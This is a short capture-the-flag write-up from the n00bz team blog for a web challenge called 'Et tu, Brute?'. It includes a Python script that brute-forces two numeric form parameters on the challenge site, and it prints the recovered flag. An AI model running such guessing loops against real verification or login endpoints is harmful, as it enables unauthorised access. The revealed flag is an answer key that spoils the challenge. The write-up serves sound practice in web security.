n00bz

Et tu, Brute?

Category

Web

Description

I want to see how many people are actually my friends and aren’t just pretending! Only my best friends get flags. You can check our friendship status at this website.

Solution

For this challenge we get a page with two inputs.

Challenge Page

Sending invalid values returns the message Sorry, you're clearly not my friend if you don't know my favorite and second favorite numbers! on /status.php.

Checking the request we find the parameters number and number2.

Using the following script we can brute force the correct numbers.

#!/usr/bin/env python3
import requests

url = 'https://mhsctf-ettubrute.0xmmalik.repl.co/status.php'

for n1 in range(1, 101):
    for n2 in range(1, 101):

        r = requests.post(url, data={'number': n1, 'number2': n2})

        print('Testing n1:', n1, 'n2:', n2, r.text)

        if 'Sorry' not in r.text:
            print(r.text)
            exit(0)

Let it run for a while and eventually we find the correct numbers.

Testing n1: 77 n2: 97 Wow! You must really be my friend if you know my favorite and second favorite numbers! Here's a flag for you: flag{pur3_s7r3ngth}

n00bz

Home of the n00bz CTF team.

By n00bz, 2022-02-20